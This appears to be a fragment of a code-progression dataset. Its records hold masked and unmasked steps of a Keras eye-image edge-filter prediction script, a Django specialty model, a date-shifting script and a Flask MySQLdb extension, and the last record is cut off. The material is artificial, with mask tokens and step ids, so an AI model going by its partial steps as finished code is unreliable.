index=False)\n\n\nx_train, y_train = set_data(train_img_path, label_df)\ny_in = np.c_[y_train, np.ones(y_train.shape[0])]\nx_test, y_test = set_data(test_img_path, label_df)\ny_out = np.c_[y_test, np.zeros(y_test.shape[0])]\nX_ = np.r_[sobel(x_train), sobel(x_test)]\nY_ = np.r_[y_in, y_out]\nouput_csv(X_, Y_, 'sobel_eye.csv')\n",
"step-4": "import random\nimport tqdm\nfrom keras.models import load_model\nfrom ModelUtil import precision, recall, f1\nfrom tqdm import tqdm\nimport cv2 as cv\nimport numpy as np\nimport os\nimport pandas as pd\nfrom PIL import Image\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nmodel_path = '/home/bo/Project/densenet.hdf5'\ntrain_img_path = '/home/bo/Project/Eyes_data/first_train/'\ntest_img_path = '/home/bo/Project/Eyes_data/first_test/'\nlabel_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv',\n error_bad_lines=False, index_col=0)\nSIZE = 224\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n return im\n\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path, custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n return ret\n\n\ndef sobel(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = 
cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n return ret\n\n\ndef scharr(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef laplace(img_set):\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m, :] = out\n return ret\n\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image / 255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.0\n else:\n low_clip = 0.0\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out * 255)\n ret[m, :] = out\n return ret\n\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path, 
custom_objects={'precision': precision,\n 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\nx_train, y_train = set_data(train_img_path, label_df)\ny_in = np.c_[y_train, np.ones(y_train.shape[0])]\nx_test, y_test = set_data(test_img_path, label_df)\ny_out = np.c_[y_test, np.zeros(y_test.shape[0])]\nX_ = np.r_[sobel(x_train), sobel(x_test)]\nY_ = np.r_[y_in, y_out]\nouput_csv(X_, Y_, 'sobel_eye.csv')\n",
"step-5": "\nimport random\nimport tqdm\nfrom keras.models import load_model\nfrom ModelUtil import precision, recall, f1\nfrom tqdm import tqdm\nimport cv2 as cv\nimport numpy as np\nimport os\nimport pandas as pd\nfrom PIL import Image\n\n\nos.environ['CUDA_VISIBLE_DEVICES']='1'\n\n\nmodel_path = '/home/bo/Project/densenet.hdf5'\ntrain_img_path = '/home/bo/Project/Eyes_data/first_train/'\ntest_img_path = '/home/bo/Project/Eyes_data/first_test/'\nlabel_df = pd.read_csv('/home/bo/Project/Eyes_data/first_label.csv', error_bad_lines=False, index_col=0)\n\nSIZE = 224\n\n\ndef preprocess_image(image_path, desired_size=SIZE):\n \"\"\"\n Resize the picture to the desired size\n :param image_path: the path of image folder\n :param desired_size: the size that image will be cropped as. The default size is 224*224\n :return: the cropped image\n \"\"\"\n im = Image.open(image_path)\n im = im.resize((desired_size,) * 2, resample=Image.LANCZOS)\n\n return im\n\ndef set_data(img_path, dataframe):\n \"\"\"\n Correspond the image to the label and return them.\n :param img_path: the path of images' folder\n :param dataframe: the .csv file that shows relation between image and label\n :return: Image, Label and the name of Image\n \"\"\"\n N = len(os.listdir(img_path))\n x_ = np.empty((N, SIZE, SIZE, 3), dtype=np.uint8)\n y_ = np.empty(N)\n image_names = np.empty(N, dtype=np.dtype(('U', 15)))\n for i, img_name in enumerate(tqdm(os.listdir(img_path))):\n x_[i, :, :, :] = preprocess_image(img_path + img_name)\n y_[i] = dataframe.loc[img_name.split('.')[0], 'level']\n image_names[i] = img_name\n\n return x_, y_\n\n\ndef predict(X):\n model = load_model(model_path,\n custom_objects={'precision': precision, 'recall': recall, 'f1': f1})\n ret = model.predict(X)\n\n return ret\n\ndef sobel(img_set):\n\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Sobel(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Sobel(np.float32(img), cv.CV_32F, 0, 1)\n gradx = 
cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n return ret\n\n\ndef canny(img_set):\n\n ret = np.empty(img_set.shape)\n for i, image in enumerate(tqdm(img_set)):\n blurred = cv.GaussianBlur(np.float32(image), (3, 3), 0)\n gray = cv.cvtColor(blurred, cv.COLOR_RGB2GRAY)\n edge_output = cv.Canny(gray, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge_output)\n print(dst)\n ret[i, :] = dst\n\n return ret\n\n\ndef scharr(img_set):\n\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n grad_x = cv.Scharr(np.float32(img), cv.CV_32F, 1, 0)\n grad_y = cv.Scharr(np.float32(img), cv.CV_32F, 0, 1)\n gradx = cv.convertScaleAbs(grad_x)\n grady = cv.convertScaleAbs(grad_y)\n gradxy = cv.addWeighted(gradx, 0.5, grady, 0.5, 0)\n ret[i, :] = gradxy\n\n\n return ret\n\ndef laplace(img_set):\n\n ret = np.empty(img_set.shape)\n for i, img in enumerate(tqdm(img_set)):\n gray_lap = cv.Laplacian(np.float32(img), cv.CV_32F, ksize=3)\n dst = cv.convertScaleAbs(gray_lap)\n ret[i, :] = dst\n\n return ret\n\n\ndef sp_noise(img_set, prob=0.1):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n out = np.zeros(image.shape, np.uint8)\n thres = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n out[i][j] = 0\n elif rdn > thres:\n out[i][j] = 255\n else:\n out[i][j] = image[i][j]\n ret[m,:] = out\n\n return ret\n\ndef gasuss_noise(img_set, mean=0, var=0.01):\n ret = np.empty(img_set.shape)\n for m, image in enumerate(tqdm(img_set)):\n image = np.array(image/255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.\n else:\n low_clip = 0.\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out*255)\n ret[m, :] = out\n return ret\n\ndef ouput_csv(X_, Y_, csv_path):\n model = load_model(model_path,\n 
custom_objects={'precision': precision, 'recall': recall, 'f1': f1})\n data = model.predict(X_)\n dataDF = pd.DataFrame(data)\n dataDF['level'] = Y_[:, 0]\n dataDF['label'] = Y_[:, 1]\n print(dataDF)\n dataDF.to_csv(csv_path, index=False)\n\n\n\n## if you would like to use sobel\nx_train, y_train = set_data(train_img_path,label_df)\ny_in = np.c_[y_train, np.ones(y_train.shape[0])]\nx_test, y_test = set_data(test_img_path,label_df)\ny_out = np.c_[y_test, np.zeros(y_test.shape[0])]\n\nX_ = np.r_[sobel(x_train), sobel(x_test)]\nY_ = np.r_[y_in, y_out]\n\nouput_csv(X_, Y_, 'sobel_eye.csv')\n\n## original output without operator\n# x_train, y_train = set_data(train_img_path,label_df)\n# y_in = np.c_[y_train, np.ones(y_train.shape[0])]\n# x_test, y_test = set_data(test_img_path,label_df)\n# y_out = np.c_[y_test, np.zeros(y_test.shape[0])]\n#\n# X_ = np.r_[x_train, x_test]\n# Y_ = np.r_[y_in, y_out]\n#\n# ouput_csv(X_, Y_, 'sobel_eye.csv')\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Especialidade(models.Model):
    """A specialty, identified by its unique name."""

    # unique=True: each specialty name may only be registered once.
    nome = models.CharField(max_length=200, verbose_name=_('Especialidade'), unique=True, blank=False, null=False)

    def __str__(self):
        # Display the specialty by its name in the admin and the shell.
        return self.nome
|
normal
|
{
"blob_id": "9cc672702d960088f0230cbd1694b295216d8b5a",
"index": 4617,
"step-1": "<mask token>\n\n\nclass Especialidade(models.Model):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Especialidade(models.Model):\n\n def __str__(self):\n return self.nome\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Especialidade(models.Model):\n\n def __str__(self):\n return self.nome\n nome = models.CharField(max_length=200, verbose_name=_('Especialidade'),\n unique=True, blank=False, null=False)\n",
"step-4": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Especialidade(models.Model):\n\n def __str__(self):\n return self.nome\n nome = models.CharField(max_length=200, verbose_name=_('Especialidade'),\n unique=True, blank=False, null=False)\n",
"step-5": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Especialidade(models.Model):\n def __str__(self):\n return self.nome\n\n # add unique=True?\n nome = models.CharField(max_length=200, verbose_name=_('Especialidade'), unique=True, blank=False, null=False)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Read a date as year/month/day and print the same date ten years later.
ss = input('날짜: 년/월/일 입력-> ')
sslist = ss.split('/')
print(sslist)
print('입력하신 날짜의 10년 후 -> ', end='')
print(f"{int(sslist[0]) + 10}년{sslist[1]}월{sslist[2]}일")
|
normal
|
{
"blob_id": "fb2ef5a90b6e2582450726905868dd1b78e36166",
"index": 5008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(sslist)\nprint('입력하신 날짜의 10년 후 -> ', end='')\n<mask token>\nprint(str(year) + '년', end='')\nprint(sslist[1] + '월', end='')\nprint(sslist[2] + '일')\n",
"step-3": "ss = input('날짜: 년/월/일 입력-> ')\nsslist = ss.split('/')\nprint(sslist)\nprint('입력하신 날짜의 10년 후 -> ', end='')\nyear = int(sslist[0]) + 10\nprint(str(year) + '년', end='')\nprint(sslist[1] + '월', end='')\nprint(sslist[2] + '일')\n",
"step-4": "# 2019/10/08 2019년10월8일\r\n\r\nss = input('날짜: 년/월/일 입력-> ')\r\n\r\nsslist = ss.split('/')\r\nprint(sslist)\r\n\r\nprint('입력하신 날짜의 10년 후 -> ', end='')\r\nyear = int(sslist[0]) + 10\r\nprint(str(year) + \"년\", end='')\r\nprint(sslist[1] + \"월\", end='')\r\nprint(sslist[2] + \"일\")\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
<|reserved_special_token_0|>
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = current_app.config[
'MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = current_app.config[
'MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
<|reserved_special_token_0|>
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MySQL(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Initialize the `app` for use with this
:class:`~flask_mysqldb.MySQL` class.
This is called automatically if `app` is passed to
:meth:`~MySQL.__init__`.
:param flask.Flask app: the application to configure for use with
this :class:`~flask_mysqldb.MySQL` class.
"""
app.config.setdefault('MYSQL_HOST', 'localhost')
app.config.setdefault('MYSQL_USER', None)
app.config.setdefault('MYSQL_PASSWORD', None)
app.config.setdefault('MYSQL_DB', None)
app.config.setdefault('MYSQL_PORT', 3306)
app.config.setdefault('MYSQL_UNIX_SOCKET', None)
app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)
app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)
app.config.setdefault('MYSQL_USE_UNICODE', True)
app.config.setdefault('MYSQL_CHARSET', 'utf8')
app.config.setdefault('MYSQL_SQL_MODE', None)
app.config.setdefault('MYSQL_CURSORCLASS', None)
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
@property
def connect(self):
kwargs = {}
if current_app.config['MYSQL_HOST']:
kwargs['host'] = current_app.config['MYSQL_HOST']
if current_app.config['MYSQL_USER']:
kwargs['user'] = current_app.config['MYSQL_USER']
if current_app.config['MYSQL_PASSWORD']:
kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
if current_app.config['MYSQL_DB']:
kwargs['db'] = current_app.config['MYSQL_DB']
if current_app.config['MYSQL_PORT']:
kwargs['port'] = current_app.config['MYSQL_PORT']
if current_app.config['MYSQL_UNIX_SOCKET']:
kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
if current_app.config['MYSQL_CONNECT_TIMEOUT']:
kwargs['connect_timeout'] = current_app.config[
'MYSQL_CONNECT_TIMEOUT']
if current_app.config['MYSQL_READ_DEFAULT_FILE']:
kwargs['read_default_file'] = current_app.config[
'MYSQL_READ_DEFAULT_FILE']
if current_app.config['MYSQL_USE_UNICODE']:
kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
if current_app.config['MYSQL_CHARSET']:
kwargs['charset'] = current_app.config['MYSQL_CHARSET']
if current_app.config['MYSQL_SQL_MODE']:
kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
if current_app.config['MYSQL_CURSORCLASS']:
kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
config['MYSQL_CURSORCLASS'])
return MySQLdb.connect(**kwargs)
<|reserved_special_token_0|>
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'mysql_db'):
ctx.mysql_db.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MySQL(object):
    """Flask extension that manages a per-app-context MySQLdb connection."""
    def __init__(self, app=None):
        # Register immediately when an app is given; otherwise the caller
        # is expected to invoke init_app() later (app-factory pattern).
        self.app = app
        if app is not None:
            self.init_app(app)
    def init_app(self, app):
        """Initialize the `app` for use with this
        :class:`~flask_mysqldb.MySQL` class.
        This is called automatically if `app` is passed to
        :meth:`~MySQL.__init__`.
        :param flask.Flask app: the application to configure for use with
        this :class:`~flask_mysqldb.MySQL` class.
        """
        # Fill in defaults without overriding anything the user already set.
        app.config.setdefault('MYSQL_HOST', 'localhost')
        app.config.setdefault('MYSQL_USER', None)
        app.config.setdefault('MYSQL_PASSWORD', None)
        app.config.setdefault('MYSQL_DB', None)
        app.config.setdefault('MYSQL_PORT', 3306)
        app.config.setdefault('MYSQL_UNIX_SOCKET', None)
        app.config.setdefault('MYSQL_CONNECT_TIMEOUT', 10)
        app.config.setdefault('MYSQL_READ_DEFAULT_FILE', None)
        app.config.setdefault('MYSQL_USE_UNICODE', True)
        app.config.setdefault('MYSQL_CHARSET', 'utf8')
        app.config.setdefault('MYSQL_SQL_MODE', None)
        app.config.setdefault('MYSQL_CURSORCLASS', None)
        # Close the per-context connection when the app context tears down.
        if hasattr(app, 'teardown_appcontext'):
            app.teardown_appcontext(self.teardown)
    @property
    def connect(self):
        """Open and return a new MySQLdb connection built from app config."""
        kwargs = {}
        # Only forward options that are configured and truthy; falsy values
        # (None, 0, '') fall back to MySQLdb's own defaults.
        if current_app.config['MYSQL_HOST']:
            kwargs['host'] = current_app.config['MYSQL_HOST']
        if current_app.config['MYSQL_USER']:
            kwargs['user'] = current_app.config['MYSQL_USER']
        if current_app.config['MYSQL_PASSWORD']:
            kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']
        if current_app.config['MYSQL_DB']:
            kwargs['db'] = current_app.config['MYSQL_DB']
        if current_app.config['MYSQL_PORT']:
            kwargs['port'] = current_app.config['MYSQL_PORT']
        if current_app.config['MYSQL_UNIX_SOCKET']:
            kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']
        if current_app.config['MYSQL_CONNECT_TIMEOUT']:
            kwargs['connect_timeout'] = current_app.config[
                'MYSQL_CONNECT_TIMEOUT']
        if current_app.config['MYSQL_READ_DEFAULT_FILE']:
            kwargs['read_default_file'] = current_app.config[
                'MYSQL_READ_DEFAULT_FILE']
        if current_app.config['MYSQL_USE_UNICODE']:
            kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']
        if current_app.config['MYSQL_CHARSET']:
            kwargs['charset'] = current_app.config['MYSQL_CHARSET']
        if current_app.config['MYSQL_SQL_MODE']:
            kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']
        if current_app.config['MYSQL_CURSORCLASS']:
            # Resolve the cursor class by name, e.g. 'DictCursor'.
            kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.
                config['MYSQL_CURSORCLASS'])
        return MySQLdb.connect(**kwargs)
    @property
    def connection(self):
        """Attempts to connect to the MySQL server.
        :return: Bound MySQL connection object if successful or ``None`` if
        unsuccessful.
        """
        # Cache one connection per application context.
        ctx = _app_ctx_stack.top
        if ctx is not None:
            if not hasattr(ctx, 'mysql_db'):
                ctx.mysql_db = self.connect
            return ctx.mysql_db
    def teardown(self, exception):
        """Close the connection stored on the app context, if any."""
        ctx = _app_ctx_stack.top
        if hasattr(ctx, 'mysql_db'):
            ctx.mysql_db.close()
<|reserved_special_token_1|>
import MySQLdb
import MySQLdb.cursors
from flask import _app_ctx_stack, current_app
class MySQL(object):
    """Flask extension that manages one MySQLdb connection per app context."""

    def __init__(self, app=None):
        self.app = app
        if app is not None:
            self.init_app(app)

    def init_app(self, app):
        """Initialize the `app` for use with this
        :class:`~flask_mysqldb.MySQL` class.
        This is called automatically if `app` is passed to
        :meth:`~MySQL.__init__`.
        :param flask.Flask app: the application to configure for use with
        this :class:`~flask_mysqldb.MySQL` class.
        """
        # Register every supported setting with its default; setdefault
        # leaves any value the application already configured untouched.
        defaults = (
            ('MYSQL_HOST', 'localhost'),
            ('MYSQL_USER', None),
            ('MYSQL_PASSWORD', None),
            ('MYSQL_DB', None),
            ('MYSQL_PORT', 3306),
            ('MYSQL_UNIX_SOCKET', None),
            ('MYSQL_CONNECT_TIMEOUT', 10),
            ('MYSQL_READ_DEFAULT_FILE', None),
            ('MYSQL_USE_UNICODE', True),
            ('MYSQL_CHARSET', 'utf8'),
            ('MYSQL_SQL_MODE', None),
            ('MYSQL_CURSORCLASS', None),
        )
        for key, value in defaults:
            app.config.setdefault(key, value)
        if hasattr(app, 'teardown_appcontext'):
            app.teardown_appcontext(self.teardown)

    @property
    def connect(self):
        """Open and return a new MySQLdb connection built from the current
        app's MYSQL_* settings; falsy settings are omitted so MySQLdb
        falls back to its own defaults."""
        cfg = current_app.config
        # Config keys paired with the MySQLdb.connect() keyword they feed.
        key_map = (
            ('MYSQL_HOST', 'host'),
            ('MYSQL_USER', 'user'),
            ('MYSQL_PASSWORD', 'passwd'),
            ('MYSQL_DB', 'db'),
            ('MYSQL_PORT', 'port'),
            ('MYSQL_UNIX_SOCKET', 'unix_socket'),
            ('MYSQL_CONNECT_TIMEOUT', 'connect_timeout'),
            ('MYSQL_READ_DEFAULT_FILE', 'read_default_file'),
            ('MYSQL_USE_UNICODE', 'use_unicode'),
            ('MYSQL_CHARSET', 'charset'),
            ('MYSQL_SQL_MODE', 'sql_mode'),
        )
        kwargs = {}
        for conf_key, conn_key in key_map:
            if cfg[conf_key]:
                kwargs[conn_key] = cfg[conf_key]
        # The cursor class is named by string in config and resolved here.
        if cfg['MYSQL_CURSORCLASS']:
            kwargs['cursorclass'] = getattr(MySQLdb.cursors,
                                            cfg['MYSQL_CURSORCLASS'])
        return MySQLdb.connect(**kwargs)

    @property
    def connection(self):
        """Attempts to connect to the MySQL server.
        :return: Bound MySQL connection object if successful or ``None`` if
        unsuccessful.
        """
        ctx = _app_ctx_stack.top
        if ctx is None:
            return None
        # Lazily open one connection per application context and reuse it.
        if not hasattr(ctx, 'mysql_db'):
            ctx.mysql_db = self.connect
        return ctx.mysql_db

    def teardown(self, exception):
        """Close the per-context connection when the app context is popped."""
        app_ctx = _app_ctx_stack.top
        if hasattr(app_ctx, 'mysql_db'):
            app_ctx.mysql_db.close()
<|reserved_special_token_1|>
import MySQLdb
import MySQLdb.cursors
from flask import _app_ctx_stack, current_app
class MySQL(object):
    """Flask extension that manages one MySQLdb connection per app context."""

    def __init__(self, app=None):
        self.app = app
        if app is not None:
            self.init_app(app)

    def init_app(self, app):
        """Initialize the `app` for use with this
        :class:`~flask_mysqldb.MySQL` class.
        This is called automatically if `app` is passed to
        :meth:`~MySQL.__init__`.
        :param flask.Flask app: the application to configure for use with
        this :class:`~flask_mysqldb.MySQL` class.
        """
        # Register every supported setting with its default; setdefault
        # leaves any value the application already configured untouched.
        defaults = (
            ('MYSQL_HOST', 'localhost'),
            ('MYSQL_USER', None),
            ('MYSQL_PASSWORD', None),
            ('MYSQL_DB', None),
            ('MYSQL_PORT', 3306),
            ('MYSQL_UNIX_SOCKET', None),
            ('MYSQL_CONNECT_TIMEOUT', 10),
            ('MYSQL_READ_DEFAULT_FILE', None),
            ('MYSQL_USE_UNICODE', True),
            ('MYSQL_CHARSET', 'utf8'),
            ('MYSQL_SQL_MODE', None),
            ('MYSQL_CURSORCLASS', None),
        )
        for key, value in defaults:
            app.config.setdefault(key, value)
        if hasattr(app, 'teardown_appcontext'):
            app.teardown_appcontext(self.teardown)

    @property
    def connect(self):
        """Open and return a new MySQLdb connection built from the current
        app's MYSQL_* settings; falsy settings are omitted so MySQLdb
        falls back to its own defaults."""
        cfg = current_app.config
        # Config keys paired with the MySQLdb.connect() keyword they feed.
        key_map = (
            ('MYSQL_HOST', 'host'),
            ('MYSQL_USER', 'user'),
            ('MYSQL_PASSWORD', 'passwd'),
            ('MYSQL_DB', 'db'),
            ('MYSQL_PORT', 'port'),
            ('MYSQL_UNIX_SOCKET', 'unix_socket'),
            ('MYSQL_CONNECT_TIMEOUT', 'connect_timeout'),
            ('MYSQL_READ_DEFAULT_FILE', 'read_default_file'),
            ('MYSQL_USE_UNICODE', 'use_unicode'),
            ('MYSQL_CHARSET', 'charset'),
            ('MYSQL_SQL_MODE', 'sql_mode'),
        )
        kwargs = {}
        for conf_key, conn_key in key_map:
            if cfg[conf_key]:
                kwargs[conn_key] = cfg[conf_key]
        # The cursor class is named by string in config and resolved here.
        if cfg['MYSQL_CURSORCLASS']:
            kwargs['cursorclass'] = getattr(MySQLdb.cursors,
                                            cfg['MYSQL_CURSORCLASS'])
        return MySQLdb.connect(**kwargs)

    @property
    def connection(self):
        """Attempts to connect to the MySQL server.
        :return: Bound MySQL connection object if successful or ``None`` if
        unsuccessful.
        """
        ctx = _app_ctx_stack.top
        if ctx is None:
            return None
        # Lazily open one connection per application context and reuse it.
        if not hasattr(ctx, 'mysql_db'):
            ctx.mysql_db = self.connect
        return ctx.mysql_db

    def teardown(self, exception):
        """Close the per-context connection when the app context is popped."""
        app_ctx = _app_ctx_stack.top
        if hasattr(app_ctx, 'mysql_db'):
            app_ctx.mysql_db.close()
|
flexible
|
{
"blob_id": "db8c2f6f5da0b52c268634043e1132984f610eed",
"index": 8405,
"step-1": "<mask token>\n\n\nclass MySQL(object):\n\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n <mask token>\n\n @property\n def connect(self):\n kwargs = {}\n if current_app.config['MYSQL_HOST']:\n kwargs['host'] = current_app.config['MYSQL_HOST']\n if current_app.config['MYSQL_USER']:\n kwargs['user'] = current_app.config['MYSQL_USER']\n if current_app.config['MYSQL_PASSWORD']:\n kwargs['passwd'] = current_app.config['MYSQL_PASSWORD']\n if current_app.config['MYSQL_DB']:\n kwargs['db'] = current_app.config['MYSQL_DB']\n if current_app.config['MYSQL_PORT']:\n kwargs['port'] = current_app.config['MYSQL_PORT']\n if current_app.config['MYSQL_UNIX_SOCKET']:\n kwargs['unix_socket'] = current_app.config['MYSQL_UNIX_SOCKET']\n if current_app.config['MYSQL_CONNECT_TIMEOUT']:\n kwargs['connect_timeout'] = current_app.config[\n 'MYSQL_CONNECT_TIMEOUT']\n if current_app.config['MYSQL_READ_DEFAULT_FILE']:\n kwargs['read_default_file'] = current_app.config[\n 'MYSQL_READ_DEFAULT_FILE']\n if current_app.config['MYSQL_USE_UNICODE']:\n kwargs['use_unicode'] = current_app.config['MYSQL_USE_UNICODE']\n if current_app.config['MYSQL_CHARSET']:\n kwargs['charset'] = current_app.config['MYSQL_CHARSET']\n if current_app.config['MYSQL_SQL_MODE']:\n kwargs['sql_mode'] = current_app.config['MYSQL_SQL_MODE']\n if current_app.config['MYSQL_CURSORCLASS']:\n kwargs['cursorclass'] = getattr(MySQLdb.cursors, current_app.\n config['MYSQL_CURSORCLASS'])\n return MySQLdb.connect(**kwargs)\n <mask token>\n\n def teardown(self, exception):\n ctx = _app_ctx_stack.top\n if hasattr(ctx, 'mysql_db'):\n ctx.mysql_db.close()\n",
